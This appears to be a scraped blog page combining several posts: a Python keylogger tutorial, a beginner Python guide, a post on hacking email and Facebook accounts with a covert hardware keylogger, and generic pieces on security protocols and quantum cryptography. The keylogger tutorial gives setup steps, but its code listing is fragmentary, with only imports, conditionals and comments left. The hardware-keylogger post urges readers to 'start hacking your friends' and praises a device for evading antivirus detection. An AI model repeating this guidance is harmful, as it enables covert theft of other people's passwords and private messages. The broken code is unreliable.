How To Make A Python Keylogger

This is tutorial that explains how to make simple keylogger that records keystrokes activities on pc and store it in .txt file. To make our keylogger we’ll use python. Why python? Python is simple powerfull and flexible programming language. By my opinion the best ,with few lines of code you can do amazing things.If you never used python , read my previous article How To Create Your First Python Program where I explained how to run simple “Hello World” script .
To make programming easier python has “Modules” that contains useful code that can extend python functionalities.
For python keylogger we’ll need to download pywin32 & pyHook modules

Step 1
Download and install pywin32 from this LINK

Step 2
Download and install pyhook from this LINK

Step 3
Launch IDLE python as Administrator and click on FIle -> New Window
idle python
new windows
Here is complete keylogger code , described with comments : Python Keylogger Code :

Source code   
import win32api
import win32console
import win32gui
import pythoncom,pyHook
def OnKeyboardEvent(event):
if event.Ascii==5:
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
#open output.txt to write current + new keystrokes
if event.Ascii==13:
# create a hook manager object
# set the hook
# wait forever
In the new window copy paste python keylogger code and click on Run -> Run Module .
kezlogger run

After this your keylogger will be launched and all keystroke activity will be stored in ‘c:\output.txt’. In the next tutorial we’ll extend python keylogger with fonctionality that send “output.txt” to specific email address. You can found keylogger code on my github account
If you’re loking for more poerful keylogger check out Facebook Keylogger

How To Create Your First Python Program

Wanna learn how to create your first python program , but don’t know where to start. This is beginner, step by step tutorial with images that will help you trough process.

Step 1
Go to , download latest version and install it.

Step 2

Run IDLE (Python GUI)

Step 3

You can run program via python shell or you can run program as python module . py extension.

Step 3.1
Run program via python shell
In Python shell type
variable = 'Hello World'
and press enter

then type
print variable
and press enter, output will be Hello World

This is simple example where we store string “Hello World” into variable and then print it out.
Step 3.2
Run as python script . py
Open notepad and type your code
variable = 'Hello World'
print variable

save as

Open IDLE and go to File -> Open and open file with .py extension

After this will appear windows where you’ll able to run module, just press F5 or go to Run -> Run Module

Hack Email accounts Using a Hardware Keylogger

Did you know key logging is the simplest way to hack email accounts ? So far in this blog I've  discussed about software key loggers such as Sniperspy for Windows , Sniperspy For Mac and  Realtimespy
If your new to the concept of  Key logging i would suggest you to read my previous articles What are KeyLoggers , How to Hack Any Email Account? to get a better understanding of the subject

Software Key loggers are not the only keyloggers that are used for hacking email or facebook accounts, there's an other type of keyloggers and they are called  Hardware keyloggers.In this article i'll explain how you can hack facebook or any other email account using a hardware keyloggers
Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards.

A hardware keylogger looks like a normal USB drive or any other computer peripheral so that the victim can never doubt that it is a keylogger, So by looking at it’s appearance it is impossible to identify it as a keylogger., Here is how a hardware keylogger may look like

How To Use HardWare Key logger to Hack Facebook account?
Installation of a Hardware key logger is very easy, Simply plug the Hardware keylogger in between the USB keyboard and the USB port.The following image shows how a keylogger is installed.

Once installed the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information.and stores them in separate log files as shown

Thus a hacker can use the information stored in a Hardware key logger to hack Face book or any other email account

Which is the Best Hardware Keylogger  ?
With my experience of more than 4 years in the field of  Hacking and security I suggest only one Hardware key logger KeyCobra Hardware Keylogger which I think is best and has a very low antivirus detection

KeyCobra Hardware Keylogger
KeyCobra is the world's smallest and smartest USB hardware keylogger. The KeyCobraUSB keyboard logger comes in a standard version (4MB memory capacity which can capture  2,000,000 keystrokes - over 1,000 pages of text), and a Venom Version (2GB memory capacity -which can capture billion keystrokes - over 1 million pages of text),  Its Completely invisible for computer operation,  It is also  compatible with Mac.

So what are you waiting for, Grab a KeyCobra Hardware Keylogger, and start hacking your friends ,You Can Buy a KeyCobra Hardware Keylogger  From the Following Link

If you any doubts regarding the article , please fell free to post a comment

Must know About Mandatory 7 Computer Security Protocols

Computer security entails protecting of the computer and the computer software from data loss, destruction and authorized access. There are several computer protocols put in place to ensure that chances of above mentioned are reduced or totally eliminated, they include practices carried out or installation of certain software or programs on the computer to enable and improve security.
Among the 7 computer security protocols that should be mandatory are

1. Using certified genuine Operating Systems - to ensure that your computer is secure from data loss, possible damage and software malfunctions ensure that you purchase and use the genuine operating systems. Always desist from installing any software that cannot be trusted.

2. Protecting home and private computers – always ensure that your Personal computers are adequately protected to eliminate possible risk. Always lock your screens wherever you leave your computer be it at home or in the office. You should also ensure that you make use of available anti – virus for your computer and also computer software should be updated always in good time.
3. Encrypting sensitive locally stored files - Windows Operating System usually comes with file encryption features, which are usually in-built. There are other encryption programs that can assist in encryption work such as the TrueCrypt utility among others. These programs easily integrate well with windows explorer.

4. Encrypting of personal information that is stored in cloud – though vendors of cloud storage vendors will normally assure that the data you have stored in cloud is utterly safe, it’s strongly advised that you encrypt it to avoid it getting to the wrong hands.

5. Preventing Keystroke loggers and other data snoops - ensure that your firewall and antivirus are in good working order to eliminate vulnerability of your systems from computer criminals, they attack when there is weakness and easy access. There are so many antivirus software’s available online. User must choose best-rated antivirus software for his PC.

6. Manual virus scanning - sometimes viruses sneak through even when there are automatic updates and regular malware scans, so it’s advisable to occasionally perform the scan manually.

7. Destroying old data – old and unused data should be properly destroyed preferably using utilities that are erase secure. This prevents data which sometimes is sensitive from falling into wrong hands.
The above 7 computer security protocols should be mandatory to ensure that the data and software in your computer is totally safe.

Ensure that all data is secured with strong encryptions, use genuine trusted software and programs and constantly update and scan your computer to improve on security. Keep your computer safe.

Quantum Cryptography - Security for mobile phones

Modern technologies have made cutting-edge breakthroughs in the domains of safety, security, privacy and confidentiality aspects of mobile devices such that increased use of technology of Quantum Cryptography using  Quantum Key Distribution as ultra-high security strategy have been advocated by promoters and marketers of this security system for mobile devices.  Indeed the need for gaining and enforcing secure mobile communications underpin societal needs with robust security offerings are now most in demand in society and business settings. This is most necessary to gain cover and security from online frauds, attacks, threats and attacks.

Moreover, it is also necessary to infer that QC is very much in its infancy in modern times with its implementation and enforcement mainly confined to bulky, expensive, highly physically tethered server rooms in banks and other financial institutions which, by virtue of being custodians of valuable public funds, resources and assets, need highest degree of secure, safe and protected environments. The usage of QC in the domains of mobile devices is indeed of recent innovations based on research conducted by researchers in University of Bristol, who have successfully demonstrated use of this technology by cutting down the bulky, costly resources reduced to the extent of just using a chip into a hand held mobile device. Simply speaking, QC employs single particles of light (photons) as data couriers and scheme is dependent on IQC (integrated quantum circuit) or chip that is crucial for adoption of secure quantum communication networking, which could lead to making of mobile devices.

Before entering into detailed aspects of QC in the domains of QKD it is necessary to understand how QKD operates. In a typical example as shown below, it is evidenced that sender generates random stream of classical bits and encodes them into sequence of non orthogonal quantum state of light over the quantum channel. Next, the recipient performs certain calculations which enable him to share some data with sender’s bit stream upon gaining of these quantum states. Next, channels check these correlations and presence of high correlations is enough to suggest that no major eavesdropping has taken place and the evidence of highly secure communication is evident.

Coming to the realms of getting QC using QKD into mobile devices have been tried and tested by researchers in the Centre under the aegis of University of Bristol for Quantum Photonics in collaboration with Nokia. This experiment considered client-server quantum key distribution scheme under which lasers and detectors are situate on server side, accessible via telecom fibre networks to client needing only on-chip polarization rotator, fixed on mobile devices. The outcomes of research seem to be optimistic about increased usage of quantum enhanced secure communications between Companies and Members of public community equipped with mobile devices that could offer telecom-fiber tethering.

With major breakthrough technology designing to delink QC in QKD from heavy, onerous and bulky tethered servers into the realms of mobile technology, the floodgates have opened to make optimum and greater use of Quantum Cryptography security for mobile technology in most appropriate, convenient and user friendly manner, after due consideration and remedial actions for the threats and challenges of QC also.


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